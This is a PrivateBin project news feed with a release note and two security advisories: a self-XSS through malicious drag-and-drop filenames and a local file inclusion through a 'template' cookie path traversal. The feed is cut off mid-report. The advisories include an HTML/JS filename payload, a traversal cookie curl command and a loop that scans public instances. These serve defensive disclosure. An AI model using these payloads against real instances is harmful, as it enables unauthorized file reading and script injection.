<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom"><title>PrivateBin</title><link href="https://privatebin.info/" rel="alternate"/><link href="https://privatebin.info/feeds/all.atom.xml" rel="self"/><id>https://privatebin.info/</id><updated>2025-11-12T08:15:00+01:00</updated><entry><title>Release v2.0.3 - Fix arbitrary PHP file inclusion &amp; self-XSS vulnerabilities</title><link href="https://privatebin.info/news/v2.0.3-release.html" rel="alternate"/><published>2025-11-12T08:15:00+01:00</published><updated>2025-11-12T08:15:00+01:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2025-11-12:/news/v2.0.3-release.html</id><summary type="html">&lt;p&gt;This release addresses issues with arbitrary PHP file inclusion when enabling template switching and lacking sanitation of file names when drag-&amp;amp;-dropping files into PrivateBin with malicious filenames.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release addresses issues with arbitrary PHP file inclusion when enabling template switching and lacking sanitation of file names when drag-&amp;amp;-dropping files into PrivateBin with malicious filenames.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This has been mitigated in &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/tag/2.0.3"&gt;PrivateBin 2.0.3&lt;/a&gt;, so we strongly urge users to update.&lt;/p&gt;
&lt;p&gt;More details of the vulnerabilties, mitigation etc. can be found in the vulnerability reports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://privatebin.info/reports/vulnerability-2025-11-12-templates.html"&gt;Template-switching feature allowing arbitrary local file inclusion through path traversal&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://privatebin.info/reports/vulnerability-2025-11-12-drag-drop.html"&gt;Malicious filename can be used for self-XSS / HTML injection locally for users&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Changes since v2.0.2&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;FIXED: Prevent arbitrary PHP file inclusion when enabling template switching&lt;/li&gt;
&lt;li&gt;FIXED: Malicious filename can be used for self-XSS / HTML injection locally for users&lt;/li&gt;
&lt;li&gt;FIXED: Unable to create a new paste from the cloned one when a JSON file attached (#1585)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;What can we offer you in return for your help?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We can offer you our mentorship, if this is your first time participating as a maintainer of an open source software project. We can guide you through submitting your first pull requests and work with you to ensure your change fulfils the communities quality standards, gets merged and makes it into a release.&lt;/li&gt;
&lt;li&gt;Your work gets publicly credited. This can help you build up a resume, showing off your growing skill set, in programming as well as your soft skills.&lt;/li&gt;
&lt;li&gt;PrivateBin is a smaller project. If you'd like to learn how to participate and contribute in an open source git project, this should be less overwhelming than larger projects.&lt;/li&gt;
&lt;li&gt;We do have a decent unit test code coverage, so it is an environment forgiving of mistakes. You may still introduce logical flaws or issues in new features, not yet covered in the tests, but you can rely on the tests preventing any regressions in other areas.&lt;/li&gt;
&lt;li&gt;You don't have to be proficient in multiple programming languages, there are a lot of things to improve within either the JavaScript or PHP areas that don't need you to understand the other side, beyond their shared API.&lt;/li&gt;
&lt;li&gt;It can be an opportunity to learn about continuous integration tools to automate tasks like tests, security scans, etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools to get you started. For any questions, you can chat with the maintainers in the &lt;a href="https://github.com/PrivateBin/PrivateBin/discussions"&gt;discussion&lt;/a&gt; area or reach us via &lt;a href="mailto:support@privatebin.org"&gt;email&lt;/a&gt;.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Vulnerability Report: Malicious filename can be used for self-XSS / HTML injection locally for users (CVE-2025-64711)</title><link href="https://privatebin.info/reports/vulnerability-2025-11-12-drag-drop.html" rel="alternate"/><published>2025-11-12T08:15:00+01:00</published><updated>2025-11-12T08:15:00+01:00</updated><author><name>rugk</name></author><id>tag:privatebin.info,2025-11-12:/reports/vulnerability-2025-11-12-drag-drop.html</id><summary type="html">&lt;p&gt;Dragging a file whose filename contains HTML is reflected verbatim into the page via the drag-and-drop helper. (CVE-2025-64711)&lt;/p&gt;</summary><content type="html">&lt;p&gt;Dragging a file whose filename contains HTML is reflected verbatim into the page via the drag-and-drop helper, so any user who drops a crafted file on PrivateBin will execute arbitrary JavaScript within their own session (self-XSS). This allows an attacker who can entice a victim to drag or otherwise attach such a file to exfiltrate plaintext, encryption keys, or stored pastes before they are encrypted or sent.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note 1:&lt;/strong&gt; as the malicious filename must contain the &lt;code&gt;&amp;gt;&lt;/code&gt; character, the victim must not be using Windows for this to work, since this OS simply forbids this character in filenames.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note 2:&lt;/strong&gt; most PrivateBin instances use the Content-Security-Policy header to prevent most use-cases of this vulnerability. This report will describe the impact as if this header had been disabled by the PrivateBin instance owner.&lt;/p&gt;
&lt;h2&gt;Affected versions&lt;/h2&gt;
&lt;p&gt;PrivateBin versions since 1.7.7.&lt;/p&gt;
&lt;h2&gt;Conditions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Only macIOS or Linux users are affected, due to the way the &lt;code&gt;&amp;gt;&lt;/code&gt; character is treated in a file name on Windows.&lt;/li&gt;
&lt;li&gt;The PrivateBIn instance needs to have file upload enabled.&lt;/li&gt;
&lt;li&gt;An attacker needs to have access to the local file system or somehow convince the user to create (or download) a malicious file (name).&lt;/li&gt;
&lt;li&gt;An attacker needs to convince the user to attach that malicious file to PrivateBin.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;p&gt;Any Mac / Linux user who can be tricked into dragging a maliciously named file into the editor is impacted; code runs in the origin of the PrivateBin instance they are using. Attackers can steal plaintext, passphrases, or manipulate the UI before data is encrypted, defeating the zero-knowledge guarantees for that victim session, assuming counter-measures like Content-Security-Policy (CSP) have been disabled.&lt;/p&gt;
&lt;p&gt;If CSP is not disabled, similar HTML injection attacks as described in CVE-2025-62796 may be possible - like redirecting to a foreign website, phishing etc.&lt;/p&gt;
&lt;h3&gt;Real-life impact&lt;/h3&gt;
&lt;p&gt;As the whole exploit needs to be included in the file name of the attached file and only affects the local session of the user (aka it is neither persistent nor remotely executable) &lt;em&gt;and&lt;/em&gt; that user needs to interact and actively attach that file to the paste, the impact is considered to be practically low.&lt;/p&gt;
&lt;h2&gt;Technical Description&lt;/h2&gt;
&lt;p&gt;When a file is dropped, &lt;code&gt;readFileData&lt;/code&gt; collects all filenames and calls &lt;code&gt;printDragAndDropFileNames&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="kd"&gt;const&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;fileNames&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;loadedFiles&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;map&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nx"&gt;loadedFile&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;=&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;loadedFile&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
&lt;span class="nx"&gt;printDragAndDropFileNames&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;fileNames&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;&lt;code&gt;printDragAndDropFileNames&lt;/code&gt; then renders those names:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;printDragAndDropFileNames&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;fileNames&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;$dragAndDropFileNames&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;html&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;fileNames&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;lt;br&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;This will insecurely render the user-submitted filenames as HTML.&lt;/p&gt;
&lt;p&gt;This vulnerability has been introduced in &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/095a5be0b6390a6e47b97d3668a23f6edec95c15"&gt;this commit&lt;/a&gt; (introduced in 1.7.7).&lt;/p&gt;
&lt;p&gt;The previous render method was using &lt;code&gt;.text()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="o"&gt;$&lt;/span&gt;&lt;span class="n"&gt;dragAndDropFileName&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;loadedFile&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;h2&gt;Reproduction Steps&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;On a Unix-like system, create a file with an HTML/JS payload in its name, e.g. by running &lt;code&gt;touch '"&amp;gt;&amp;lt;img src=x onerror=alert(document.domain)&amp;gt;.txt'&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Deploy or use any PrivateBin instance with attachments enabled (including https://privatebin.net/).&lt;/li&gt;
&lt;li&gt;Open the UI in a browser and start a new paste.&lt;/li&gt;
&lt;li&gt;Drag the crafted file anywhere on the page&lt;/li&gt;
&lt;li&gt;As soon as it is dropped, the filename is inserted into &lt;code&gt;#dragAndDropFileName&lt;/code&gt; as HTML and the onerror handler fires (assuming CSP is disabled), showing the alert.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Mitigation&lt;/h2&gt;
&lt;p&gt;We strongly recommend you to &lt;strong&gt;upgrade to our latest release&lt;/strong&gt;. However, here are some workarounds that may help you to mitigate this vulnerability without upgrade:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Update the &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration#cspheader"&gt;CSP in your configuration file&lt;/a&gt; to the latest recommended settings and check that it isn't getting reverted or overwritten by your web server, reverse proxy or CDN, i.e. using &lt;a href="https://privatebin.info/directory/check"&gt;our offered check service&lt;/a&gt;.
   &lt;strong&gt;Note:&lt;/strong&gt; You should check your CSP independently, even if you upgrade to a fixed version.&lt;/li&gt;
&lt;li&gt;Deploying PrivateBin on a separate domain may limit the scope of the vulnerability to PrivateBin itself and thus, as described in the “Impact” section, effectively prevent any damage by the vulnerability to other resources you are hosting.&lt;/li&gt;
&lt;li&gt;As explained in the impact assessment, disabling attachments also prevents this issue.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Patches&lt;/h3&gt;
&lt;p&gt;The issue has been patched in version 2.0.3.&lt;/p&gt;
&lt;h2&gt;Credits&lt;/h2&gt;
&lt;p&gt;We'd like to thank &lt;a href="https://github.com/esnard"&gt;Benoit Esnard&lt;/a&gt;, who reported this vulnerability.&lt;/p&gt;
&lt;p&gt;In general, we'd like to thank everyone reporting issues and potential vulnerabilities to us.&lt;/p&gt;
&lt;p&gt;If you think you have found a vulnerability or potential security risk, &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/SECURITY.md"&gt;we'd kindly ask you to follow our security policy&lt;/a&gt; and report it to us. We then assess the report and will take the actions we deem necessary to address it.&lt;/p&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;2025-11-09 Received report via GitHub Security Advisory&lt;/li&gt;
&lt;li&gt;2025-11-10 Discussed and reproduced issue, created a patch&lt;/li&gt;
&lt;li&gt;2025-11-11 Further work on patch&lt;/li&gt;
&lt;li&gt;2025-11-12 Released patch with PrivateBin 2.0.3&lt;/li&gt;
&lt;/ul&gt;</content><category term="Reports"/><category term="PrivateBin"/><category term="Security"/></entry><entry><title>Vulnerability Report: Template-switching feature allowing arbitrary local file inclusion through path traversal (CVE-2025-64714)</title><link href="https://privatebin.info/reports/vulnerability-2025-11-12-templates.html" rel="alternate"/><published>2025-11-12T08:15:00+01:00</published><updated>2025-11-12T08:15:00+01:00</updated><author><name>rugk</name></author><id>tag:privatebin.info,2025-11-12:/reports/vulnerability-2025-11-12-templates.html</id><summary type="html">&lt;p&gt;An unauthenticated Local File Inclusion exists in the template-switching feature. (CVE-2025-64714)&lt;/p&gt;</summary><content type="html">&lt;p&gt;An unauthenticated Local File Inclusion exists in the template-switching feature: if &lt;code&gt;templateselection&lt;/code&gt; is enabled in the configuration, the server trusts the &lt;code&gt;template&lt;/code&gt; cookie and includes the referenced PHP file. An attacker can read sensitive data or, if they manage to drop a PHP file elsewhere, gain RCE.&lt;/p&gt;
&lt;h2&gt;Affected versions&lt;/h2&gt;
&lt;p&gt;PrivateBin versions since 1.7.7.&lt;/p&gt;
&lt;h2&gt;Conditions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;templateselection&lt;/code&gt; got enabled in &lt;code&gt;cfg/conf.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Visitor sets a cookie &lt;code&gt;template&lt;/code&gt; pointing to an existing PHP file without it's suffix, using a path relative to the &lt;code&gt;tpl&lt;/code&gt; folder. Absolute paths do not work.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;p&gt;The constructed path of the template file is checked for existence, then included. For PrivateBin project files this does not leak any secrets due to data files being created with PHP code that prevents execution, but if a configuration file without that line got created or the visitor figures out the relative path to a PHP script that directly performs an action without appropriate privilege checking, those might execute or leak information.&lt;/p&gt;
&lt;h3&gt;Impact analysis&lt;/h3&gt;
&lt;p&gt;In detail, we have analyzed different ways of exploiting this vulnerability and found no way to cause a full remote code execution (RCE) vulnerability or denial of service (DoS) as recursive includes, e.g., are not possible.&lt;/p&gt;
&lt;p&gt;Generally, it is again notably to remember only PHP files of the local filesystem can be included. That's why we have analyzed PrivateBin's PHP files, that may be an attack target.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the PrivateBin config file is by default &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/591d2d40e16a196aa628e3962a1c21bdf9793db2/cfg/conf.sample.php#L1"&gt;protected as it prevents access itself&lt;/a&gt; resulting in a 403 HTTP status code. We further call this the “(PHP) protection line”.&lt;/li&gt;
&lt;li&gt;Likewise, the paste data cannot be accessed due to that “protection line”. &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/591d2d40e16a196aa628e3962a1c21bdf9793db2/lib/Data/Filesystem.php#L46"&gt;Each created file contains the same line protecting it against&lt;/a&gt; PHP execution/inclusion.&lt;/li&gt;
&lt;li&gt;As for the &lt;code&gt;salt&lt;/code&gt;, &lt;code&gt;purge_&lt;/code&gt; and &lt;code&gt;traffic_limiter&lt;/code&gt; files, they get included, but no data is displayed (variables or comments only), and a webserver specific error message is returned.&lt;/li&gt;
&lt;li&gt;When one tries to include &lt;code&gt;index.php&lt;/code&gt;, you get a PHP error (possibly visible, depending on the webserver setup), due to define being called twice.&lt;/li&gt;
&lt;li&gt;With any of the files in lib and likely those in vendor (we have not verified each dependency), code is only declared and not executed and the result is again a webserver specific error message.&lt;/li&gt;
&lt;li&gt;With the scripts in bin, the result is an error message, but code is executed to some extent, but you cannot pass arguments to any administrative scripts &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/d32ac29925066c668241a165264c76de051398e3/bin/administration#L357C37-L357C54"&gt;as they are read via &lt;code&gt;$_SERVER['argc']&lt;/code&gt;&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That said, the vulnerability could be used to chain more attacks or execute other non-PrivateBin related PHP files on the host system, if such other files exist and the (relative) path to them can be guessed.
Also, should for some reason the PHP “protection line” be missing on your deployment the impact could be much worse and e.g. data like the URL shortener token or the database configuration from the configuration file could possibly be exfiltrated.&lt;/p&gt;
&lt;h3&gt;Real-life impact&lt;/h3&gt;
&lt;p&gt;We checked all instances versioned 1.7.7 and above listed in the &lt;a href="https://privatebin.info/directory/"&gt;PrivateBin directory&lt;/a&gt; and did find 11 instances that had the template switcher enabled. We used the following script to detect this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="k"&gt;for&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;URL&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;$&lt;span class="ss"&gt;(&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="nv"&gt;curl&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="nv"&gt;silent&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="nv"&gt;header&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Accept: application/json&amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;https://privatebin.info/directory/api?top=100&amp;amp;version=1.7.7&amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;jq&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="nv"&gt;raw&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nv"&gt;output&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;.[].url&amp;#39;&lt;/span&gt;
&lt;span class="ss"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;$&lt;span class="ss"&gt;(&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="nv"&gt;curl&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="nv"&gt;silent&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="nv"&gt;header&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Accept: application/json&amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;https://privatebin.info/directory/api?top=100&amp;amp;version=1.7.8&amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;jq&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="nv"&gt;raw&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nv"&gt;output&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;.[].url&amp;#39;&lt;/span&gt;
&lt;span class="ss"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;$&lt;span class="ss"&gt;(&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="nv"&gt;curl&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="nv"&gt;silent&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="nv"&gt;header&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Accept: application/json&amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;https://privatebin.info/directory/api?top=100&amp;amp;version=2&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;jq&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="nv"&gt;raw&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nv"&gt;output&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;.[].url&amp;#39;&lt;/span&gt;
&lt;span class="ss"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;do&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="nv"&gt;curl&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="nv"&gt;silent&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;$URL&amp;quot;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;grep&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nv"&gt;q&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;id=&amp;quot;template&amp;quot;&amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;echo&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;$URL uses template switcher&amp;quot;&lt;/span&gt;
&lt;span class="nv"&gt;done&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;None of these instances had an unprotected PrivateBin configuration file in use. We used the following script, that may be adapted to check any single instance:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;curl --silent --cookie  &amp;#39;template=../cfg/conf&amp;#39; https://privatebin.net
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;h2&gt;Technical Description&lt;/h2&gt;
&lt;p&gt;Users can select their preferred template via the &lt;code&gt;template&lt;/code&gt; cookie, as seen in &lt;code&gt;TemplateSwitcher::getSelectedByUserTemplate&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="nt"&gt;private&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;static&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;function&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;getSelectedByUserTemplate&lt;/span&gt;&lt;span class="o"&gt;():&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="nt"&gt;string&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="err"&gt;$selectedTemplate&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="err"&gt;$templateCookieValue&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;$_COOKIE&lt;/span&gt;&lt;span class="cp"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;template&amp;#39;&lt;/span&gt;&lt;span class="cp"&gt;]&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;??&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="err"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nf"&gt;isTemplateAvailable&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="err"&gt;$&lt;/span&gt;&lt;span class="n"&gt;templateCookieValue&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="err"&gt;$&lt;/span&gt;&lt;span class="n"&gt;selectedTemplate&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;$&lt;/span&gt;&lt;span class="n"&gt;templateCookieValue&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="nt"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;$&lt;/span&gt;&lt;span class="nt"&gt;selectedTemplate&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;In &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/44f8cfbfb8df4b4bec1cbf79aa8ce51abdb18be3"&gt;this commit&lt;/a&gt;, introduced in 1.7.7, the &lt;code&gt;TemplateSwitcher::isTemplateAvailable&lt;/code&gt; method went from this:&lt;/p&gt;
